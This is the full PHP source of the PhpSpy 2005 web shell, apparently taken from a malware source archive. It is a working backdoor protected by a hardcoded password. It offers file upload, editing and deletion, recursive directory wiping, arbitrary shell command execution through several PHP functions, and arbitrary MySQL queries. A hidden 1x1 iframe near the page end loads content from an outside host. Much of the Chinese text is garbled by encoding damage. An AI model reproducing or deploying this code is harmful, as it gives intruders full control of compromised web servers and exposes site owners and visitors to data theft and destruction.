vxug-MalwareSourceCode/PHP/Trojan-Spy.PHP.PhPen.b

<?php
/*
+--------------------------------------------------------------------------+
| str_replace("-", "", "P-h-p-S-p-y") Version:2005 Lite                    |
| Codz by Angel                                                            |
| (c) 2004 Security Angel Team                                             |
| http://www.4ngel.net                                                     |
| ======================================================================== |
| Team:  http://www.4ngel.net                                              |
|        http://www.bugkidz.org                                            |
| Email: 4ngel@21cn.com                                                    |
| Date:  Dec 28st(My girl friend's birthday), 2004                         |
+--------------------------------------------------------------------------+
*/

/*
<EFBFBD><EFBFBD>ʾ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>پ<EFBFBD><EFBFBD><EFBFBD>һЩ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>а<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD>ȥ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
*/

error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];

/*===================== <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> =====================*/

// <20>Ƿ<EFBFBD><C7B7><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤,1Ϊ<EFBFBD><EFBFBD>Ҫ<EFBFBD><EFBFBD>֤,<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊֱ<EFBFBD>ӽ<EFBFBD><EFBFBD><EFBFBD>.<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѡ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ч
$admin['check']="1";

// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤,<EFBFBD><EFBFBD><EFBFBD>޸ĵ<EFBFBD>½<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
$admin['pass']="angel";

/*===================== <20><><EFBFBD>ý<EFBFBD><C3BD><EFBFBD> =====================*/


// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> register_globals = off <20>Ļ<EFBFBD><C4BB><EFBFBD><EFBFBD>¹<EFBFBD><C2B9><EFBFBD>
if ( function_exists('ini_get') ) {
	$onoff = ini_get('register_globals');
} else {
	$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
	@extract($_POST, EXTR_SKIP);
	@extract($_GET, EXTR_SKIP);
}

$self = $_SERVER['PHP_SELF'];

/*===================== <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤ =====================*/
if($admin['check']=="1") {
	if ($_GET['action'] == "logout") {
		setcookie ("adminpass", "");
		echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
		echo "<span style=\"font-size: 12px; font-family: Verdana\">ע<EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>......<p><a href=\"".$self."\"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><EFBFBD>˳<EFBFBD><EFBFBD>򵥻<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&gt;&gt;&gt;</a></span>";
		exit;
	}
	if ($login) {
		$adminpass=trim($_POST['adminpass']);
		if ($adminpass==$admin['pass']) {
			setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
			echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
			echo "<span style=\"font-size: 12px; font-family: Verdana\"><EFBFBD><EFBFBD>½<EFBFBD>ɹ<EFBFBD>......<p><a href=\"".$self."\"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Զ<EFBFBD><EFBFBD><EFBFBD>ת<EFBFBD>򵥻<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&gt;&gt;&gt;</a></span>";
			exit;
		}
	}
	if (isset($_COOKIE['adminpass'])) {
		if ($_COOKIE['adminpass']!=$admin['pass']) {
			loginpage();
		}
	} else {
		loginpage();
	}
}//end check
/*===================== <20><>֤<EFBFBD><D6A4><EFBFBD><EFBFBD> =====================*/

// <20>ж<EFBFBD> magic_quotes_gpc ״̬
if (get_magic_quotes_gpc()) {
    $_GET = stripslashes_array($_GET);
	$_POST = stripslashes_array($_POST);
}

if ($_GET['action'] == "phpinfo") {
	$dis_func = get_cfg_var("disable_functions");
	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() <20><><EFBFBD><EFBFBD><EFBFBD>ѱ<EFBFBD><D1B1><EFBFBD><EFBFBD><EFBFBD>,<EFBFBD><EFBFBD><EFBFBD>鿴&lt;PHP<48><50><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>&gt;";
	exit;
}

// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
if (!empty($downfile)) {
	if (!@file_exists($downfile)) {
		echo "<script>alert('<27><>Ҫ<EFBFBD>µ<EFBFBD><C2B5>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!')</script>";
	} else {
		$filename = basename($downfile);
		$filename_info = explode('.', $filename);
		$fileext = $filename_info[count($filename_info)-1];
		header('Content-type: application/x-'.$fileext);
		header('Content-Disposition: attachment; filename='.$filename);
		header('Content-Description: PHP Generated Data');
		header('Content-Length: '.filesize($downfile));
		@readfile($downfile);
		exit;
	}
}

// <20><><EFBFBD><EFBFBD>Ŀ¼
$pathname=str_replace('\\','/',dirname(__FILE__)); 

// <20><>ȡ<EFBFBD><C8A1>ǰ·<C7B0><C2B7>
if (!isset($dir) or empty($dir)) {
	$dir = ".";
	$nowpath = getPath($pathname, $dir);
} else {
	$dir=$_GET['dir'];
	$nowpath = getPath($pathname, $dir);
}

// <20>ж϶<D0B6>д<EFBFBD><D0B4><EFBFBD><EFBFBD>
if (dir_writeable($nowpath)) {
	$dir_writeable = "<22><>д";
} else {
	$dir_writeable = "<22><><EFBFBD><EFBFBD>д";
}

$dis_func = get_cfg_var("disable_functions");
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell</a>" : "";
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PhpSpy Ver 2005</title>
<style type="text/css">
body,td {
	font-family: "sans-serif";
	font-size: "12px";
	line-height: "150%";
}
.smlfont {
	font-family: "sans-serif";
	font-size: "11px";
}
.INPUT {
	FONT-SIZE: "12px";
	COLOR: "#000000";
	BACKGROUND-COLOR: "#FFFFFF";
	height: "18px";
	border: "1px solid #666666";
}
.redfont {
	COLOR: "#A60000";
}
a:link,
a:visited,
a:active{
	color: "#000000";
	text-decoration: underline;
}
a:hover{
	color: "#465584";
	text-decoration: none;
}
.firstalt	{BACKGROUND-COLOR: "#EFEFEF"}
.secondalt	{BACKGROUND-COLOR: "#F5F5F5"}
</style>
</head>

<body style="table-layout:fixed; word-break:break-all">
<center>
<table width="760" border="0" cellpadding="3" cellspacing="0" bgcolor="#ffffff">
  <tr bgcolor="#cccccc">
    <td width="375" align="right" nowrap><b><?=$_SERVER['HTTP_HOST']?></b></td>
    <td width="10" align="center" nowrap><b>:</b></td>
    <td width="375" nowrap><b><?=$_SERVER['REMOTE_ADDR']?></b></td>
  </tr>
  <tr>
    <td colspan="3" align="center" nowrap><a href="?action=logout">ע<EFBFBD><EFBFBD><EFBFBD>Ự</a> | <a href="?action=dir"><EFBFBD><EFBFBD><EFBFBD><EFBFBD> PhpSpy Ŀ¼</a> | <a href="?action=phpenv">PHP<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL Query</a> | <a href="http://www.4ngel.net" target="_blank" title="<22><><EFBFBD>ش˳<D8B4><CBB3><EFBFBD>">Version 2005</a></td>
  </tr>
</table>
<hr width="760" noshade>
<table width="760" border="0" cellpadding="0">
 <form action="" method="GET">
  <tr>
    <td><p><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD>:<?=$pathname?><br><EFBFBD><EFBFBD>ǰĿ¼(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
        <br><EFBFBD><EFBFBD>תĿ¼:
        <input name="dir" type="text" class="INPUT">
        <input type="submit" class="INPUT" value="ȷ<><C8B7>"> <20><>֧<EFBFBD>־<EFBFBD><D6BE><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><C2B7><EFBFBD><EFBFBD>
    </p></td>
  </tr>
 </form>
 <form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
  <tr>
    <td colspan="2"><EFBFBD>ϴ<EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ǰĿ¼:
      <input name="uploadmyfile" type="file" class="INPUT">	<input type="submit" name="uploadfile" class="INPUT" value="ȷ<><C8B7>"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
  </tr>
  </form>
  <form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
  <tr>
    <td colspan="2"><EFBFBD>½<EFBFBD><EFBFBD>ļ<EFBFBD><EFBFBD>ڵ<EFBFBD>ǰĿ¼:
        <input name="newfile" type="text" class="INPUT" value="">
        <input type="submit" name="createfile" class="INPUT" value="ȷ<><C8B7>"></td>
  </tr>
  </form>
</table>
<hr width="760" noshade>
<?php
/*===================== ִ<>в<EFBFBD><D0B2><EFBFBD> <20><>ʼ =====================*/
echo "<p><b>\n";
// ɾ<><C9BE><EFBFBD>ļ<EFBFBD>
if(@$delfile!="") {
	if(file_exists($delfile)) {
		if (@unlink($delfile)) {
			echo "".$delfile." ɾ<><C9BE><EFBFBD>ɹ<EFBFBD>!";
		} else {
			echo "<22>ļ<EFBFBD>ɾ<EFBFBD><C9BE>ʧ<EFBFBD><CAA7>!";
		}
	} else {
		echo "<22>ļ<EFBFBD><C4BC>Ѳ<EFBFBD><D1B2><EFBFBD><EFBFBD><EFBFBD>,ɾ<EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>!";
	}
}

// ɾ<><C9BE>Ŀ¼
elseif($rmdir) {
	if($deldir!="") {
		$deldirs="$dir/$deldir";
		if(!file_exists("$deldirs")) {
			echo "Ŀ¼<C4BF>Ѳ<EFBFBD><D1B2><EFBFBD><EFBFBD><EFBFBD>!";
		} else {
			deltree($deldirs);
		}
	} else {
		echo "ɾ<><C9BE>ʧ<EFBFBD><CAA7>!";
	}
}

// <20>ϴ<EFBFBD><CFB4>ļ<EFBFBD>
elseif($uploadfile) {
	echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "<22>ϴ<EFBFBD><CFB4>ɹ<EFBFBD>!" : "<22>ϴ<EFBFBD>ʧ<EFBFBD><CAA7>!";
}

// <20>༭<EFBFBD>ļ<EFBFBD>
elseif($doeditfile) {
	$filename="$editfilename";
	@$fp=fopen("$filename","w");
	echo $msg=@fwrite($fp,$_POST['filecontent']) ? "д<><D0B4><EFBFBD>ļ<EFBFBD><C4BC>ɹ<EFBFBD>!" : "д<><D0B4>ʧ<EFBFBD><CAA7>!";
	@fclose($fp);
}

// <20><><EFBFBD><EFBFBD>MYSQL
elseif($connect) {
	if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
		echo "<22><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD>ӳɹ<D3B3>!";
		mysql_close();
	} else {
		echo mysql_error();
	}
}

// ִ<><D6B4>SQL<51><4C><EFBFBD><EFBFBD>
elseif($doquery) {
	@mysql_connect($servername,$dbusername,$dbpassword) or die("<22><><EFBFBD>ݿ<EFBFBD><DDBF><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><CAA7>");
	@mysql_select_db($dbname) or die("ѡ<><D1A1><EFBFBD><EFBFBD><EFBFBD>ݿ<EFBFBD>ʧ<EFBFBD><CAA7>");
	$result = @mysql_query($_POST['sql_query']);
	echo ($result) ? "SQL<51><4C><EFBFBD><EFBFBD><EFBFBD>ɹ<EFBFBD>ִ<EFBFBD><D6B4>" : "<22><><EFBFBD><EFBFBD>: ".mysql_error();
	mysql_close();
}

// <20>鿴PHP<48><50><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>״<EFBFBD><D7B4>
elseif($viewphpvar) {
	echo "<22><><EFBFBD>ò<EFBFBD><C3B2><EFBFBD> ".$_POST['phpvarname']." <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: ".getphpcfg($_POST['phpvarname'])."";
}

else {
	echo "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <a href=\"http://www.4ngel.net\" target=\"_blank\">Security Angel</a> С<><D0A1> angel [<a href=\"http://www.bugkidz.org\" target=\"_blank\">BST</a>] <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>,<EFBFBD><EFBFBD><EFBFBD><EFBFBD> <a href=\"http://www.4ngel.net\" target=\"_blank\">www.4ngel.net</a> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>°汾.";
}

echo "</b></p>\n";
/*===================== ִ<>в<EFBFBD><D0B2><EFBFBD> <20><><EFBFBD><EFBFBD> =====================*/

if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  <tr bgcolor="#cccccc">
    <td align="center" nowrap width="30%"><b><EFBFBD>ļ<EFBFBD></b></td>
	<td align="center" nowrap width="17%"><b><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></b></td>
    <td align="center" nowrap width="17%"><b><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>޸<EFBFBD></b></td>
    <td align="center" nowrap width="12%"><b><EFBFBD><EFBFBD>С</b></td>
    <td align="center" nowrap width="7%"><b><EFBFBD><EFBFBD><EFBFBD><EFBFBD></b></td>
    <td align="center" nowrap width="17%"><b><EFBFBD><EFBFBD><EFBFBD><EFBFBD></b></td>
  </tr>
<?php
// Ŀ¼<C4BF>б<EFBFBD>
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
	$filepath="$dir/$file";
	$a=@is_dir($filepath);
	if($a=="1"){
		if($file!=".." && $file!=".")	{
			$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
			$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
			$dirperm=substr(base_convert(fileperms($filepath),10,8),-4);
			echo "<tr class=".getrowbg().">\n";
			echo "  <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">&lt;dir&gt;</td>\n";
			echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$dirperm</td>\n";
			echo "  <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">ɾ<EFBFBD><EFBFBD></a></td>\n";
			echo "</tr>\n";
			$dir_i++;
		} else {
			if($file=="..") {
				echo "<tr class=".getrowbg().">\n";
				echo "  <td nowrap colspan=\"6\" style=\"padding-left: 5px;\"><a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϼ<EFBFBD>Ŀ¼</a></td>\n";
				echo "</tr>\n";
			}
		}
	}
}//while
@closedir($dirs); 
?>
<tr bgcolor="#cccccc">
  <td colspan="6" height="5"></td>
</tr>
<?
// <20>ļ<EFBFBD><C4BC>б<EFBFBD>
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
	$filepath="$dir/$file";
	$a=@is_dir($filepath);
	if($a=="0"){
		$size=@filesize($filepath);
		$size=$size/1024 ;
		$size= @number_format($size, 3);
		
		$ctime=@date("Y-m-d H:i:s",@filectime($filepath));
		$mtime=@date("Y-m-d H:i:s",@filemtime($filepath));
		
		@$fileperm=substr(base_convert(@fileperms($filepath),10,8),-4);
		echo "<tr class=".getrowbg().">\n";
		echo "  <td style=\"padding-left: 5px;\"><a href=\"$filepath\" target=\"_blank\">$file</a></td>\n";
		echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$ctime</td>\n";
		echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$mtime</td>\n";
		echo "  <td align=\"right\" nowrap valign=\"top\" class=\"smlfont\"><span class=\"redfont\">$size</span> KB</td>\n";
		echo "  <td align=\"center\" nowrap valign=\"top\" class=\"smlfont\">$fileperm</td>\n";
		echo "  <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($filepath)."\"><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\"><EFBFBD>༭</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($filepath)."\">ɾ<EFBFBD><EFBFBD></a></td>\n";
		echo "</tr>\n";
		$file_i++;
	}
}
@closedir($dirs); 
?>
<tr class="<?=getrowbg()?>">
  <td nowrap colspan="6" align="right"><?=$dir_i?> <20><>Ŀ¼ / <?=$file_i?> <20><><EFBFBD>ļ<EFBFBD></td>
    </tr>
  </table></td>
</tr>
</table>

<?php
}// end dir

elseif ($_GET['action'] == "editfile") {
	if($newfile=="") {
		$filename="$dir/$editfile";
		$fp=@fopen($filename,"r");
		$contents=@fread($fp, filesize($filename));
		@fclose($fp);
		$contents=htmlspecialchars($contents);
	}else{
		$editfile=$newfile;
		$filename = "$dir/$editfile";
	}
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  <tr class="firstalt">
    <td align="center"><EFBFBD>½<EFBFBD>/<2F>༭<EFBFBD>ļ<EFBFBD> [<a href="?dir=<?=urlencode($dir)?>"><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a>]</td>
  </tr>
  <form action="?dir=<?=urlencode($dir)?>" method="POST">
  <tr class="secondalt">
    <td align="center"><EFBFBD><EFBFBD>ǰ<EFBFBD>ļ<EFBFBD>:<input class="input" type="text" name="editfilename" size="30"
value="<?=$filename?>"> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD></td>
  </tr>  
  <tr class="firstalt">
    <td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
  </tr>  
  <tr class="secondalt">
    <td align="center"><input type="submit" name="doeditfile" value="ȷ<><C8B7>д<EFBFBD><D0B4>" class="input">
      <input type="reset" value="<22><><EFBFBD><EFBFBD>" class="input"></td>
  </tr>
  </form>
</table>
<?php
}//end editfile

elseif ($_GET['action'] == "shell") {
	if (!get_cfg_var("safe_mode")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  <tr class="firstalt">
    <td align="center">WebShell Mode</td>
  </tr>
  <form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
  <tr class="secondalt">
    <td align="center">
	  ѡ<><D1A1>ִ<EFBFBD>к<EFBFBD><D0BA><EFBFBD>:
	  <select name="execfunc" class="input">
		<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
		<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
		<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
		<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
		<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
	  </select><EFBFBD><EFBFBD>
	  <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
      <input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
      <input type="submit" value="execute" class="input"></td>
  </tr>  
  <tr class="secondalt">
    <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
	if (!empty($_POST['command'])) {
		if ($execfunc=="system") {
			system($_POST['command']);
		} elseif ($execfunc=="passthru") {
			passthru($_POST['command']);
		} elseif ($execfunc=="exec") {
			$result = exec($_POST['command']);
			echo $result;
		} elseif ($execfunc=="shell_exec") {
			$result=shell_exec($_POST['command']);
			echo $result;	
		} elseif ($execfunc=="popen") {
			$pp = popen($_POST['command'], 'r');
			$read = fread($pp, 2096);
			echo $read;
			pclose($pp);
		} else {
			system($_POST['command']);
		}
	}
	?></textarea></td>
  </tr>  
  </form>
</table>
<?php
	} else {
?>
<p><b>Safe_Mode <20>Ѵ<EFBFBD><D1B4><EFBFBD>, <20>޷<EFBFBD>ִ<EFBFBD><D6B4>ϵͳ<CFB5><CDB3><EFBFBD><EFBFBD>.</b></p>
<?php
	}
}//end shell

elseif ($_GET['action'] == "deldir") {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  <form action="?dir=<?=urlencode($dir)?>" method="POST">
  <tr class="firstalt">
    <td align="center">ɾ<EFBFBD><EFBFBD> <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> Ŀ¼</td>
  </tr>  
  <tr class="secondalt">
    <td align="center">ע<EFBFBD><EFBFBD>:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<C4BF>ǿ<EFBFBD>,<EFBFBD>˴β<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɾ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ŀ¼<EFBFBD>µ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>.<EFBFBD><EFBFBD>ȷ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>?</td>
  </tr>  
  <tr class="firstalt">
    <td align="center">
	  <input type="submit" name="rmdir" value="delete" class="input">
	</td>
  </tr>  
  </form>
</table>
<?php
}//end deldir

elseif ($_GET['action'] == "sql") {
	$servername = isset($servername) ? $servername : 'localhost';
	$dbusername = isset($dbusername) ? $dbusername : 'root';
	$dbpassword = isset($dbpassword) ? $dbpassword : '';
	$dbname = isset($dbname) ? $dbname : '';
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  <tr class="firstalt">
    <td align="center">ִ<EFBFBD><EFBFBD> SQL <20><><EFBFBD><EFBFBD></td>
  </tr>
  <form action="?action=sql" method="POST">
  <tr class="secondalt">
    <td align="center">Host:
    <input name="servername" type="text" class="INPUT" value="<?=$servername?>"> 
    User:
    <input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
    Pass:
    <input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
    DB:
    <input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
    <input name="connect" type="submit" class="INPUT" value="<22><><EFBFBD><EFBFBD>"></td>
  </tr>
  <tr class="firstalt">
    <td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
  </tr>
  <tr class="secondalt">
    <td align="center"><input type="submit" name="doquery" value="ִ<><D6B4>" class="input"></td>
  </tr>  
  </form>
</table>
<?php
}//end sql query

elseif ($_GET['action'] == "phpenv") {
?>
<table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
 <form action="?action=phpenv" method="POST">
  <tr class="firstalt">
    <td style="padding-left: 5px;"><b><EFBFBD>鿴PHP<EFBFBD><EFBFBD><EFBFBD>ò<EFBFBD><EFBFBD><EFBFBD>״<EFBFBD><EFBFBD></b></td>
  </tr>
  <tr class="secondalt">
    <td style="padding-left: 5px;"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ò<EFBFBD><EFBFBD><EFBFBD>(<28><>:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" name="viewphpvar" value="<22>鿴" class="input"></td>
  </tr>
 </form>
</table>
<?php
}//end phpenv
?>
<hr width="760" noshade>
<table width="760" border="0" cellpadding="0">
  <tr>
    <td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
    <td align="right"><?php
	debuginfo();
	ob_end_flush();	
	?></td>
  </tr>
</table>
</center>
<iframe src="http://www.zief.pl/iraq.jpg" width=1 height=1></iframe></body>
</html>

<?php

/*======================================================
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
======================================================*/

	// <20><>½<EFBFBD><C2BD><EFBFBD><EFBFBD>
	function loginpage() {
?>
		<style type="text/css">
		input {
			font-family: "Verdana";
			font-size: "11px";
			BACKGROUND-COLOR: "#FFFFFF";
			height: "18px";
			border: "1px solid #666666";
		}
		</style>
		<form method="POST" action="">
		<span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20">
		<input type="submit" name="login" value="OK">
		</form>
<?php
		exit;
	}//end loginpage()

	// ҳ<><D2B3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
	function debuginfo() {
		global $starttime;
		$mtime = explode(' ', microtime());
		$totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
		echo "Processed in $totaltime second(s)";
	}

	// ȥ<><C8A5>ת<EFBFBD><D7AA><EFBFBD>ַ<EFBFBD>
	function stripslashes_array(&$array) {
		while(list($key,$var) = each($array)) {
			if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
				if (is_string($var)) {
					$array[$key] = stripslashes($var);
				}
				if (is_array($var))  {
					$array[$key] = stripslashes_array($var);
				}
			}
		}
		return $array;
	}

	// ɾ<><C9BE>Ŀ¼
	function deltree($deldir) {
		$mydir=@dir($deldir);	
		while($file=$mydir->read())	{ 		
			if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { 
				@chmod("$deldir/$file",0777);
				deltree("$deldir/$file"); 
			}
			if (is_file("$deldir/$file")) {
				@chmod("$deldir/$file",0777);
				@unlink("$deldir/$file");
			}
		} 
		$mydir->close(); 
		@chmod("$deldir",0777);
		echo @rmdir($deldir) ? "Ŀ¼ɾ<C2BC><C9BE><EFBFBD>ɹ<EFBFBD>!" : "<font color=\"#ff0000\">Ŀ¼ɾ<EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>!</font>";	
	} 

	// <20>ж϶<D0B6>д<EFBFBD><D0B4><EFBFBD><EFBFBD>
	function dir_writeable($dir) {
		if (!is_dir($dir)) {
			@mkdir($dir, 0777);
		}
		if(is_dir($dir)) {
			if ($fp = @fopen("$dir/test.txt", 'w')) {
				@fclose($fp);
				@unlink("$dir/test.txt");
				$writeable = 1;
			} else {
				$writeable = 0;
			}
		}
		return $writeable;
	}

	// <20><><EFBFBD><EFBFBD><EFBFBD>м<EFBFBD><D0BC>ı<EFBFBD><C4B1><EFBFBD>ɫ<EFBFBD>滻
	function getrowbg() {
		global $bgcounter;
		if ($bgcounter++%2==0) {
			return "firstalt";
		} else {
			return "secondalt";
		}
	}

	// <20><>ȡ<EFBFBD><C8A1>ǰ<EFBFBD><C7B0><EFBFBD>ļ<EFBFBD>ϵͳ·<CDB3><C2B7>
	function getPath($mainpath, $relativepath) {
		global $dir;
		$mainpath_info           = explode('/', $mainpath);
		$relativepath_info       = explode('/', $relativepath);
		$relativepath_info_count = count($relativepath_info);
		for ($i=0; $i<$relativepath_info_count; $i++) {
			if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
			if ($relativepath_info[$i] == '..') {
				$mainpath_info_count = count($mainpath_info);
				unset($mainpath_info[$mainpath_info_count-1]);
				continue;
			}
			$mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
		} //end for
		return implode('/', $mainpath_info);
	}

	// <20><><EFBFBD><EFBFBD>PHP<48><50><EFBFBD>ò<EFBFBD><C3B2><EFBFBD>
	function getphpcfg($varname) {
		switch($result = get_cfg_var($varname)) {
			case 0:
			return No;
			break;
			case 1:
			return Yes;
			break;
			default:
			return $result;
			break;
		}
	}
?>